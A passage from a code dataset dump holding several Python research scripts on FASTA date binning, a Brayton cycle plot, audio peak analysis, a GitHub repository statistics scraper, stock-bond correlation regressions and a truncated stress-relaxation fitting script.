record.id[0:10])\n\t\tdates.append(record.id[0:10])\n\t\ttry:\n\t\t\ttimestmp.append((i,time.mktime(datetime.datetime.strptime(record.id[0:10],\"%Y-%m-%d\").timetuple())))\n\t\t\tstmps.append(time.mktime(datetime.datetime.strptime(record.id[0:10],\"%Y-%m-%d\").timetuple()))\n\t\texcept(ValueError):\n\t\t\ttry:\n\t\t\t\ttimestmp.append((i,time.mktime(datetime.datetime.strptime(record.id[0:7],\"%Y-%m\").timetuple())))\n\t\t\t\tstmps.append(time.mktime(datetime.datetime.strptime(record.id[0:7],\"%Y-%m\").timetuple()))\n\t\t\texcept:\n\t\t\t\t#print('unknown time in ID: ', record.id)\n\t\t\t\tbad_time_count += 1\n\t\t\t\tpass\n\n\tsorted_timestmp = sorted(timestmp,key=lambda x: x[1])\nhandle.close()\t\n\n\nchrono_bins = create_bins(int(min(stmps))-10, math.ceil(((max(stmps)+10)-(min(stmps)-10))/3.), 3)\nfrom scipy.stats import binned_statistic\n\n\nhist, bin_edges = np.histogram(stmps, bins=10, range=(int(min(stmps)), int(max(stmps))))\nprint(hist)\nprint(bin_edges)\nprint('with max %d and min %d timestamps we have the following chrono-bins:\\n'%(max(stmps),min(stmps)),chrono_bins)\nprint('%d timed sequences'%len(stmps)) \n\nprint('%d bad timestamps'%bad_time_count) \nfor clade in clade_determinants.keys():\n\tprint('Clade: %s has %d sequences'%(clade,len(clade_records[clade])))\n\tprint('writing...')\t\t\n\tout_file1 = data_out+'%s_aligned.fasta'%clade\n\twith open(out_file1,\"w\") as output_handle:\n\t\tSeqIO.write(clade_records[clade],output_handle,\"fasta\")\n\toutput_handle.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"get_chrono.py","file_name":"get_chrono.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"577839267","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate  # the package to find the area\n\n\nP1 = 1.0  # Pa\nV1 = 1.0  # m^3\nP2 = 40.0  # Pa\nT1 = 20.0 + 273.15  # Kelvin\nT3 = 1000.0 + 273.15  # Kelvin\nR = 8.3144598  # J * /(mol * K)\ncp = 7.0 * R / 2.0  # specific heat cap (J * /(mol * K))\ngamma = 1.4  # air constant\n\nV2 = V1 * np.power(P1 / P2, 1 / gamma)\n\nT2 = T1 * np.power(V1 / V2, gamma - 1)\n\nV3 = T3 * V2 / T2\n# = V2 + nR(T3 - T2) / P2 # find an eq\n\nP3 = P2  # Isobar!\nP4 = P1  # Isobar!\n\nV4 = V3 * np.power(P3 / P4, 1 / gamma)\n\nT4 = T3 * np.power(V4 / V3, gamma - 1)  # check it again\n\nT1 = T4 * V1 / V4\n\nn = P2 * V2 / (R * T2)  # the number of moles using the ideal gas law\n\n# plot time!\nplt.figure(figsize=(10, 10))\nV = np.linspace(V1, V2)\n# the curve on the left P1 -> P2 (ADIABATIC)\nplt1 = P1 * 
np.power(V1 / V, gamma)\nplt.plot(V, plt1, 'r--', linewidth=1.5, label='1-2 adiabat')\n\nV = np.linspace(V4, V3)  # the curve on the right P3 -> P4 (ADIABATIC)\nplt2 = P4 * np.power(V4 / V, gamma)\nplt.plot(V, plt2, 'b--', linewidth=1.5, label='3-4 adiabat')\n\nV = np.linspace(V2, V3)\nplt3 = P2 * np.ones(V.shape)  # the line at the top (ISOBAR)\nplt.plot(V, plt3, 'g-', linewidth=1.5, label='2-3 isobar')\n\nV = np.linspace(V1, V4)\nplt4 = P1 * np.ones(V.shape)  # the line at the bottom (ISOBAR)\nplt.plot(V, plt4, 'k-', linewidth=1.5, label='4-1 isobar')\n\n\nplt.xlabel('Volume, V (m ^ 3)', fontsize=18)\nplt.ylabel('Pressure, P (Pa)', fontsize=18)\nplt.title(\"Brayton Cycle\", fontsize=30)\nplt.grid('on')\nplt.legend(loc=0, prop={'size': 15})\n#plt.axis([0, 2, 0, 50])\n\n\n# calc the areas\n\n# plt1\na = V2\nb = V1\nf = lambda x: P1 * np.power(V1 / x, gamma)\nplt1Area, error = integrate.quad(f, a, b)\n\n# plt2\na = V3\nb = V4\nf = lambda x: P4 * np.power(V4 / x, gamma)\nplt2Area, error = integrate.quad(f, a, b)\n\n# plt3\na = V2\nb = V3\nf = lambda x: P2\nplt3Area, error = integrate.quad(f, a, b)\n\n# plt4\na = V1\nb = V4\nf = lambda x: P1\nplt4Area, error = integrate.quad(f, a, b)\n\nWork = plt2Area + plt3Area - plt1Area - plt4Area\nQ_h = n * cp * (T3 - T2)\n\neta1 = (Work / Q_h) * 100\neta2 = (1 - np.power(P1 / P2, 1 - 1 / gamma)) * 100\nprint(\"Eta1: {} , Eta2: {}\".format(eta1, eta2))\n\nprint(\"Area: {}\".format(Work))\n\nplt.show()\n","sub_path":"BraytonCycle.py","file_name":"BraytonCycle.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84380867","text":"\"\"\"\nanalyzes .wav files for peak freqs and stores in layered dict structure and\nwrites to data.json file\nlast updated: 2.12.2020\njohn eagle\n\"\"\"\n\n# std library imports\nimport sys\n# package imports\nfrom parameters import params\nimport program_functions as pf\nimport timings\nimport text_file_io as tfio\n\n# set custom parameters\nparams['offset thresh'] = \"8:00\"\nparams['offset unit'] = \"minute\"\nparams['offset inc'] = -2\nparams['total peaks'] = 60\nparams['playback duration'] = 5\n\nparams['total peaks'] = 120\n\ntry:\n    # see if user provided directory name at command line\n    pf.set_directory(sys.argv[1], params)\nexcept:\n    # default\n    pf.set_directory(\"default results\", params)\n\nmics = ['shotgun', 'stereo']\n\n# SCORE\n\"\"\"\n# do macro_times first\nprint(\"BUILDING MACRO DICT\")\nmacro = pf.make_macro_sections(params, timings.macro_times, 4, mics)\ntfio.write_out_dict_json(macro, params=params)\n\"\"\"\n\"\"\"\n# part 1\nprint(\"BUILDING PART 1\")\npart1 = pf.make_macro_sections(params, timings.player_one, 1, mics, one_part=1)\ntfio.write_out_dict_json(part1, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n\"\"\"\n\"\"\"\n# part 2\nprint(\"BUILDING PART 2\")\npart2 = pf.make_macro_sections(params, timings.player_two, 1, mics, one_part=2)\ntfio.write_out_dict_json(part2, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n\n\"\"\"\n\"\"\"\n# part 3\nprint(\"BUILDING PART 3\")\npart3 = pf.make_macro_sections(params, timings.player_three, 1, mics, one_part=3)\ntfio.write_out_dict_json(part3, params=params)\n\nread_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n\"\"\"\n# part 4\nprint(\"BUILDING PART 4\")\npart4 = pf.make_macro_sections(params, timings.player_four, 1, mics, one_part=4)\ntfio.write_out_dict_json(part4, params=params)\n\nread_back = 
read_back = tfio.read_in_dict_json(params=params)\nprint(read_back['1']['shotgun'])\n","sub_path":"ICP/fieldHarmonyPackage/analyze_audio.py","file_name":"analyze_audio.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320552175","text":"from __future__ import print_function\r\nfrom github import Github\r\nimport urllib,json\r\nimport codecs\r\nimport urllib.request as UrlRequest\r\nimport requests\r\nimport base64\r\nfrom urllib.error import URLError, HTTPError\r\nimport re\r\nfrom bs4 import BeautifulSoup,SoupStrainer\r\nimport os\r\nimport time\r\nusername=b'yyyyyyyyyy'\r\npassword=b'xxxxxxxxxx'\r\nbase64string = base64.b64encode(username + b\":\" + password)\r\n\r\nfrom dataclean import scrape_element,get_url_content,get_subscribers,get_numberoffiles,get_package,get_wiki,get_submodules\r\nfrom license_file import get_license\r\nfrom print_file import print_file\r\n\r\ng = Github(client_id=\"\",client_secret=\"\",per_page=100)\r\nprint(\"Rate remaining \",g.get_rate_limit().rate.remaining)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# -----\r\nif __name__ == '__main__':\r\n \r\n debug = open(\"debug.log\", \"w\")\r\n outputfile = open(\"stats.csv\", \"w\")\r\n outputfile.write(\"Organization,Name, URL, Forks_Count, Watchers_Count, Stargazers, Release Count, Branch Count, Commit Count, Contrib Count,License, LicenseText, ReadmeText, SubModules, PackageJSON, Patents \\n\")\r\n #orgs = ['apple','ibm','google','facebook','twitter','mozilla','twbs','github','jquery','h5bp','angular']\r\n #orgs = ['apple', 'ibm', 'google', 'facebook', 'twitter', 'mozilla', 'twbs', 'github', 'jquery', 'h5bp', 'angular']\r\n outputfile.close()\r\n debug.close()\r\n orgs = []\r\n\r\n for orgname in orgs:\r\n for repo in g.get_user(orgname).get_repos():\r\n #print(repo.name)\r\n #if(repo.name == 'FreeCAD-addons'):\r\n #print(\"Repo URL:\", repo.url)\r\n # print(\"Repo watchers :\", repo.watchers_count)\r\n # print(\"Repo stargazers: \", repo.stargazers_count)\r\n # print(\"Repo forks count : \", repo.forks_count)\r\n releases = repo.get_releases()\r\n relcount = 0\r\n branchcount = 0\r\n commitcount = 0\r\n contribcount = 0\r\n watchers=0\r\n for rel in releases:\r\n relcount = relcount + 1\r\n\r\n\r\n if (0):\r\n\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\"}\r\n url = \"https://api.github.com/organizations?since=\"\r\n sincenum = 24600\r\n while (sincenum):\r\n newurl = url + str(sincenum)\r\n response = UrlRequest.Request(newurl, headers=headers)\r\n result = UrlRequest.urlopen(response)\r\n data = result.read().decode('utf8')\r\n listofrepos = json.loads(data)\r\n if len(listofrepos) == 0:\r\n sincenum = 0\r\n else:\r\n for ijk in listofrepos:\r\n print(ijk[\"login\"])\r\n sincenum = sincenum + 100\r\n #print(\"Since num\", sincenum)\r\n #print(\"Rate remaining \", g.get_rate_limit().rate.remaining)\r\n\r\n # -----\r\n if (1):\r\n #print(\r\n #Organization,Name, URL, Forks_Count, Watchers_Count, Stargazers, Release Count, Branch Count, Commit Count, Contrib Count,License )\r\n # orgs = ['apple','ibm','google','facebook','twitter','mozilla','twbs','github','jquery','h5bp','angular']\r\n # orgs = ['apple', 'ibm', 'google', 'facebook', 'twitter', 'mozilla', 'twbs', 'github', 'jquery', 'h5bp', 'angular']\r\n orgs = ['apple']\r\n\r\n\r\n #for j in orgs:\r\n # print(j)\r\n #filteredrepos=['azonenberg','FreeCAD']\r\n filteredrepos=[]\r\n
 deprepos=[]\r\n print(\"Started Collecting Stats.....\")\r\n repoid=0\r\n urldict={}\r\n repodict={}\r\n #with open('Listofrepos', \"r\") as myfile:\r\n if(0):\r\n with open('Repos3', \"r\") as myfile:\r\n for line in myfile:\r\n lines=line.split(\"/\")\r\n filteredrepos.append(lines[3])\r\n\r\n repoid=repoid+1\r\n deprepos.append(lines[4])\r\n repodict[lines[3]]=lines[4]\r\n key=lines[3]+\"_\"+lines[4]\r\n linestr = line.replace('\\n', '')\r\n\r\n urldict[key]=linestr\r\n #print(lines[3],\" \",lines[4])\r\n # modified on 01-11-2016 if (repo.name in ('FreeCAD-addons', 'openfpga')):\r\n #filteredrepos = ['azonenberg']\r\n #for k, v in urldict.items():\r\n # print(\"Key \", k,\" Value \", v)\r\n if(0):\r\n orgrepos=[]\r\n repoid=0\r\n #print(\"Just before scraping\",len(filteredrepos))\r\n filteredrepos=[]\r\n with open('orglist.main','r') as myfile:\r\n for line in myfile:\r\n line=line.replace('\\n','')\r\n #if(re.match(r'^d',line)):\r\n filteredrepos.append(line)\r\n\r\n for orgname in filteredrepos:\r\n try:\r\n try:\r\n # print(\"Getting \",orgname)\r\n orguser=g.get_user(orgname)\r\n except HTTPError as e:\r\n print(\"Error\")\r\n orgrepos=orguser.get_repos()\r\n #orgrepos.append('activemq')\r\n except HTTPError as e:\r\n print(\"Error\")\r\n\r\n #for repo in orgrepos:\r\n for repo in g.get_repos(since=167170):\r\n #if(repo.name in ['activemq']):\r\n print(\"Collecting stats for \",repo.id)\r\n debug=open(\"debug.log\",\"a\")\r\n outputfile = open(\"stats.csv\", \"a\")\r\n debug.write(\"Repo %s, UserName %s \\n\" %(repo.name,repo.owner.login))\r\n relcount = 0\r\n branchcount = 0\r\n commitcount = 0\r\n contribcount = 0\r\n watcherscount=0\r\n\r\n contents_url = repo.url + \"/contents/\"\r\n packageyes= (get_package(contents_url))\r\n raterem = g.get_rate_limit().rate.remaining\r\n debug.write(\"Rate Limit %d \\n\" %(raterem))\r\n if (int(raterem) < 500):\r\n print(\"Sleeping......\")\r\n time.sleep(7200)\r\n if(packageyes):\r\n # Created date\r\n print(\"Collecting STATS....\")\r\n releases = repo.get_releases()\r\n created = repo.created_at\r\n updated = repo.updated_at\r\n size = repo.size\r\n langlist = repo.get_languages()\r\n languages = []\r\n totalfiles = 0\r\n for key in langlist.keys():\r\n value=langlist[key]\r\n #print(key,\" \",value)\r\n languages.append(key)\r\n totalfiles = totalfiles + int(value)\r\n\r\n languages = \":\".join(languages)\r\n if(repo.forks_count > 1 and repo.fork == 0):\r\n print(\"Getting Releases \")\r\n for rel in releases:\r\n relcount = relcount + 1\r\n for branches in repo.get_branches():\r\n branchcount = branchcount + 1\r\n print(\"Getting Contributors\")\r\n for contrib in repo.get_contributors():\r\n contribcount = contribcount + 1\r\n\r\n for commits in repo.get_commits():\r\n commitcount = commitcount + 1\r\n watcherscount=get_subscribers(repo.url)\r\n print(\"LICENSE\")\r\n glicense=\"\"\r\n licensefiles=\"\"\r\n glicense,licensefiles = get_license(repo.url)\r\n print(\"DEPS\")\r\n dependsonpatents,listofpatents=get_wiki(repo.owner.login,repo.name)\r\n print(\"After WIKI\")\r\n wikitext=[]\r\n wikitextfull=\"\"\r\n if (os.path.isfile(dependsonpatents)):\r\n\r\n with open(dependsonpatents, \"r\", encoding=\"utf8\") as myfile:\r\n\r\n for line in myfile:\r\n line = re.sub(r'[^a-zA-Z0-9.]', ' ', line)\r\n line = re.sub(r'\\s+', ' ', line)\r\n line = line.strip()\r\n wikitext.append(line)\r\n wikitextfull = \" \".join(wikitext)\r\n wikitextfull= (wikitextfull[:32000] + '..') if len(wikitextfull) > 32000 else wikitextfull\r\n
readmetext1=\"\"\r\n gitmodules=[]\r\n packagejson=[]\r\n dependentrepos =(get_submodules(contents_url))\r\n print(\"Printing DEPS\")\r\n if(type(dependentrepos) == type(list()) and (len(dependentrepos) > 0)):\r\n for i in dependentrepos:\r\n\r\n if('README' in i):\r\n print(\"printing README\")\r\n with open(i, \"r\",encoding=\"utf8\") as myfile:\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n readmetext.append(line)\r\n readmetext1=\" \".join(readmetext)\r\n readmetext1=(readmetext1[:32000] + '..') if len(readmetext1) > 32000 else readmetext1\r\n\r\n if ('modules' in i):\r\n print(\"printing MODULES\")\r\n with open(i, \"r\") as myfile:\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\/\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n gitmodules.append(line)\r\n gitmodules = \" \".join(gitmodules)\r\n gitmodules = (gitmodules[:32000] + '..') if len(gitmodules) > 32000 else gitmodules\r\n if ('package' in i):\r\n print(\"printing PACKAGE\")\r\n if (os.path.isfile(i)):\r\n with open(i, \"r\") as myfile:\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\/\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n packagejson.append(line)\r\n packagejson=\" \".join(packagejson)\r\n packagejson = (packagejson[:32000] + '..') if len(packagejson) > 32000 else packagejson\r\n licensetext = []\r\n glicense.strip()\r\n if(os.path.isfile(licensefiles)):\r\n\r\n with codecs.open(licensefiles,\"r\",encoding=\"utf8\") as myfile:\r\n\r\n for line in myfile:\r\n line = re.sub('[^a-zA-Z0-9\\.]', ' ', line)\r\n line = re.sub('\\s+', ' ', line)\r\n line.strip()\r\n licensetext.append(line)\r\n licensetext=\" \".join(licensetext)\r\n licensetext = (licensetext[:32000] + '..') if len(licensetext) > 32000 else licensetext\r\n apps_using = []\r\n\r\n totalfiles = get_numberoffiles(contents_url, 0)\r\n print(\"Printing stat file\\n\")\r\n outputfile.write(\"%s,%s,%s,%d,%d,\" %(repo.owner.login,repo.name,repo.html_url,repo.forks_count,watcherscount))\r\n outputfile.write(\"%d,%d,%d,%d,%d,\" %(repo.stargazers_count, relcount, branchcount, commitcount, contribcount))\r\n outputfile.write(\"%s,%s,%d,%s,%d,%s,\\\"%s\\\",\\\"%s\\\"\" %(str(created),str(updated),size,languages,totalfiles,glicense,licensetext,readmetext1))\r\n outputfile.write(\"\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\n\" %(gitmodules, packagejson,wikitextfull,''.join(listofpatents),apps_using))\r\n debug.close()\r\n outputfile.close()\r\n \r\n repoid=repoid+1\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"MachineLearning/WebCrawling_TextAnalytics/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":13436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588068658","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\n\n# =============================================================================\n# from WindPy import w\n# \n# w.start()\n# \n# def getWsd(wsd):\n# df = pd.DataFrame(wsd.Data).T\n# df.index = wsd.Times\n# df.columns = wsd.Codes \n# return df\n# \n# \n# wsd = w.wsd(\"881001.WI,000016.SH,CBA00102.CS,CBA00202.CS,CBA00662.CS\", \"pct_chg\", \"2000-01-01\", \"2018-07-29\", \"Period=M\")\n# # 全A, 50, 新综合, 
# # All-A, SSE 50, New Composite, Composite, 10Y Treasury \n# df_idx = getWsd(wsd)\n# =============================================================================\n\n\n\ndf_idx = pd.read_csv('idx.csv', index_col=0, parse_dates=[0])\ndf_idx = df_idx['2002':].iloc[:, [0, 2]]\n\nlag = 12\nsr_corr = df_idx['881001.WI'].rolling(lag).corr(df_idx['CBA00102.CS'])\nsr_beta = sr_corr / df_idx['881001.WI'].rolling(lag).std() * df_idx['CBA00102.CS'].rolling(lag).std()\n\nsr_corr.dropna(inplace=True)\nsr_beta.dropna(inplace=True)\n# year-by-year correlation\nsr_corr_gp = sr_corr.groupby(lambda x: x.year).agg(lambda x: x[-1]).dropna()\nsr_beta_gp = sr_beta.groupby(lambda x: x.year).agg(lambda x: x[-1]).dropna()\n\n# 881001 index performance\nsr_881 = (1 + df_idx['881001.WI'] / 100).cumprod()\n\nplt.plot(sr_corr, 'r')\nplt.twinx()\nplt.plot(sr_881, 'b')\n\nplt.plot(sr_beta, 'g')\nplt.twinx()\nplt.plot(sr_881, 'b')\n\nplt.figure(figsize=(25,8))\nplt.plot(sr_corr, 'g')\nplt.twinx()\nplt.plot(sr_881, 'b')\n\ndef corr_spearman(df, lag):\n sr = pd.Series(index=df.index, name='corr')\n for i in range(lag, len(df)):\n sr.iloc[i] = df.iloc[i-lag:i].corr(method='spearman').iloc[0, -1]\n return sr\n\nsr_corr_sm = corr_spearman(df_idx, lag)\n \nplt.plot(sr_corr.index, sr_corr, sr_corr_sm.index, sr_corr_sm)\nplt.grid()\n\n\n# load interest-rate and inflation data\ndf_rate = pd.read_csv('rate.csv', index_col=0, parse_dates=[0])\ndf_rate = df_rate.resample('M').mean()\ndf_cpi = pd.read_csv('cpi.csv', index_col=0, parse_dates=[0])\n\n# align the series\nsr_corr.name='Corr'\nsr_corr = sr_corr['2003':'2018-06']\nsr_rate = df_rate.Rate['2003':'2018-06']\nsr_cpi = df_cpi.CPI['2003':'2018-06']\n\n# regression\nfrom sklearn import linear_model\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_rate.values, sr_cpi.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n# load growth and money-supply data\ndf_m2 = pd.read_csv('m2.csv', index_col=0, parse_dates=[0])\ndf_gdp = pd.read_csv('gdp.csv', index_col=0, parse_dates=[0])\nsr_m2 = df_m2.M2['2003':'2018-06']\nsr_gdp = df_gdp.GDP['2003':'2018-06']\ndf_tmp = pd.concat([sr_m2, sr_gdp], axis=1)\ndf_tmp = df_tmp.fillna(method='bfill')\nsr_gdp = df_tmp.GDP\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_rate.values, sr_cpi.values, sr_m2.values, sr_gdp.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n# hand off to R for the cointegration analysis\ndf_r = pd.DataFrame(np.vstack([X, y]).T, index=sr_corr.index, columns=['rate', \n 'cpi', 'm2', 'gdp', 'corr'])\n\ndf_r.to_csv('df_r.csv')\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_cpi.values, sr_m2.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n# compute the correlation from daily data\n\n# =============================================================================\n# from WindPy import w\n# w.start()\n# \n# def getWsd(wsd):\n# df = pd.DataFrame(wsd.Data).T\n# df.index = wsd.Times\n# df.columns = wsd.Codes \n# return df\n# \n# wsd = w.wsd(\"881001.WI, CBA00102.CS\", \"pct_chg\", \"2000-01-01\", \"2018-07-31\", \"Period=D\")\n# df_idx = getWsd(wsd)\n# w.stop()\n# \n# =============================================================================\ndf = pd.read_csv('df.csv', index_col=0, parse_dates=[0])\nsr_corr = df.resample('M').apply(lambda x: x.corr().iloc[0, 1])\nsr_corr.name = \"corr\"\n\nsr_beta = df.resample('M').apply(lambda x: x.corr().iloc[0, 1] / x.iloc[:, 0].std()\n * x.iloc[:, 1].std())\n\n\nsr_corr_y = df.resample('Y').apply(lambda x: x.corr().iloc[0, 1])\n
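# beta is the slope of regressing bond returns on stock returns: corr * std(bond) / std(stock).\n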
sr_beta_y = df.resample('Y').apply(lambda x: x.corr().iloc[0, 1] / x.iloc[:, 0].std()\n * x.iloc[:, 1].std())\n\n\n# load interest-rate, inflation, growth and money-supply data\ndf_rate = pd.read_csv('rate.csv', index_col=0, parse_dates=[0])\ndf_rate = df_rate.resample('M').mean()\ndf_cpi = pd.read_csv('cpi.csv', index_col=0, parse_dates=[0])\ndf_m2 = pd.read_csv('m2.csv', index_col=0, parse_dates=[0])\ndf_gdp = pd.read_csv('gdp.csv', index_col=0, parse_dates=[0])\n\n# align the series\nsr_corr = sr_corr['2002':'2018-06']\nsr_rate = df_rate.Rate['2002':'2018-06']\nsr_cpi = df_cpi.CPI['2002':'2018-06']\nsr_m2 = df_m2.M2['2002':'2018-06']\nsr_gdp = df_gdp.GDP['2002':'2018-06']\n\ndf_tmp = pd.concat([sr_m2, sr_gdp], axis=1)\ndf_tmp = df_tmp.fillna(method='bfill')\nsr_gdp = df_tmp.GDP\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_rate.values, sr_cpi.values, sr_m2.values, sr_gdp.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n# hand off to R for the cointegration analysis\ndf_r = pd.DataFrame(np.vstack([X, y]).T, index=sr_corr.index, columns=['rate', \n 'cpi', 'm2', 'gdp', 'corr'])\n\ndf_r.to_csv('df_r.csv')\n\n#\nreg = linear_model.LinearRegression()\nX = np.vstack([sr_cpi.values, sr_m2.values])\ny = sr_corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(sr_corr.index, y, sr_corr.index, y_p)\n\n\n\n# =============================================================================\n# start over from scratch\n# =============================================================================\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nfrom sklearn import linear_model\n\n#from WindPy import w\n#w.start()\n# \n#def getWsd(wsd):\n# df = pd.DataFrame(wsd.Data).T\n# df.index = wsd.Times\n# df.columns = wsd.Codes \n# return df\n# \n#wsd_d = w.wsd(\"881001.WI, CBA00102.CS\", \"pct_chg\", \"2000-01-01\", \"2018-07-31\", \"Period=D\")\n#wsd_m = w.wsd(\"881001.WI, CBA00102.CS\", \"pct_chg\", \"2000-01-01\", \"2018-06-30\", \"Period=M\")\n#\n#df_d = getWsd(wsd_d)\n#df_m = getWsd(wsd_m)\n#w.stop()\n\n#df_d.dropna().to_csv('df_d.csv')\n#df_m.dropna().to_csv('df_m.csv')\n\n\ndf_m = pd.read_csv('df_m.csv', index_col=0, parse_dates=[0])\n\nlag = 12\ncorr = df_m['881001.WI'].rolling(lag).corr(df_m['CBA00102.CS'])\nbeta = corr / df_m['881001.WI'].rolling(lag).std() * df_m['CBA00102.CS'].rolling(lag).std()\ncorr.name = 'corr'\nbeta.name = 'beta'\n\ny_e = df_m['881001.WI']\ny_b = df_m['CBA00102.CS']\n\n# a picture is worth a thousand words\n\n# fig1\n# =============================================================================\n# sort = df_m[df_m['881001.WI']<0].sort_values(by='881001.WI').values\n# \n# fig, ax = plt.subplots(dpi=200)\n# ax.bar(np.arange(len(sort)), sort[:,0], label='Stock')\n# ax.set_ylabel(\"Stock (%)\")\n# ax.legend(loc=3)\n# ax2 = ax.twinx()\n# ax2.plot(np.arange(len(sort)), sort[:,1], 'r', label='Bond')\n# ax2.axhline(0, color='k')\n# ax2.set(ylim=[-2, 2])\n# ax2.set_ylabel(\"Bond (%)\")\n# ax2.legend(loc=4)\n# =============================================================================\n\n# fig2\n# =============================================================================\n# sort = df_m.sort_values(by='881001.WI').values\n# for i in range(5):\n# s = i * len(sort) // 5\n# e = (i + 1) * len(sort) // 5\n# plt.hist(sort[s:e, 1], bins=7)\n# plt.show()\n# =============================================================================\n\n\n# candidate factors: growth, inflation, interest rates, liquidity\n# GDP growth, CPI, DR007, M2, \n\n# load interest-rate, inflation, growth and money-supply data\n
df_rate = pd.read_csv('rate.csv', index_col=0, parse_dates=[0])\ndf_rate = df_rate.resample('M').mean()\ndf_cpi = pd.read_csv('cpi.csv', index_col=0, parse_dates=[0])\ndf_m2 = pd.read_csv('m2.csv', index_col=0, parse_dates=[0])\ndf_gdp = pd.read_csv('gdp.csv', index_col=0, parse_dates=[0])\n\n# align the series\ncorr = corr['2003':'2018-06']\nrate = df_rate.Rate['2003':'2018-06']\ncpi = df_cpi.CPI['2003':'2018-06']\nm2 = df_m2.M2['2003':'2018-06']\ngdp = df_gdp.GDP['2003':'2018-06']\n\ndf_tmp = pd.concat([m2, gdp], axis=1)\ndf_tmp = df_tmp.fillna(method='bfill')\ngdp = df_tmp.GDP\n\ny_e = y_e['2003':'2018-06']\ny_b = y_b['2003':'2018-06']\n\n\n# strong autocorrelation: a plain regression does worse than a simple autoregression\nreg = linear_model.LinearRegression()\nX = np.vstack([rate.values, cpi.values, m2.values, gdp.values])\ny = corr.values\nreg.fit(X.T, y)\ny_p = reg.predict(X.T)\nplt.plot(corr.index, y, corr.index, y_p)\nplt.plot(corr.index, y, corr.index[1:], y[:-1])\n\n# hand off to R\ndata = np.vstack([corr.values, rate.values, cpi.values, m2.values, \n gdp.values, y_e.values, y_b.values])\ncol_names = ['corr', 'rate', 'cpi', 'm2', 'gdp', 'y_e', 'y_b']\nRdata = pd.DataFrame(data.T, index=corr.index, columns=col_names)\nRdata.index.name = 'Date'\nRdata.to_csv('Rdata.csv')\n\n# \nreg = linear_model.LinearRegression()\nX = np.vstack([rate.diff().values, cpi.diff().values, m2.diff().values, gdp.diff().values])\ny = corr.values\nreg.fit(X[:, 1:].T, y[1:])\ny_p = reg.predict(X[:, 1:].T)\nplt.plot(corr.index[1:], y[1:], corr.index[1:], y_p)\n","sub_path":"EB_corr.py","file_name":"EB_corr.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246011010","text":"\"\"\"\nFILE: stress_resistance_relaxation.py\nAUTHOR: R Ellingham\nDATE MODIFIED: Jun 2021\nDATE CREATED: Jun 2021\nPROGRAM DESC: Matlab style script for fitting a relaxation model to stress and \napparent resistance relaxation data.\nNOTES: Made for Spyder IDE\n\nTODO:\n1)\n2)\n\"\"\"\n\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import optimize\nimport scipy.stats as stats\nimport matplotlib\nimport data_ems\n\n#%% Setup parameters and determine all stress and strain values\n\n# Test specimen dimensions (in m):\nspec_length = 40e-3\nspec_length_inner_electrodes = 20e-3\nspec_width = 10e-3\nspec_thickness = 4e-3\n\ninput_filename = \"2_7-5_E4pin_20mm_v6.csv\"\n\n# Extract experimental csv data\nRo,Ri,tR,P,tP,F,tF = data_ems.extract_csv(input_filename)\n\n# Correct any erroneously gathered position values and scale to meters\nP = data_ems.pos_outlier_corrector(P) * 1e-3 \n\n# Interpolate data to get a constant sample frequency across all measurements\nt_lin, F_t, P_t, Ro_t, Ri_t = data_ems.interpolate_RFS_data(Ro,Ri,tR,P,tP,F,tF)\n\n# Use a MAF on the resistance data if it is an 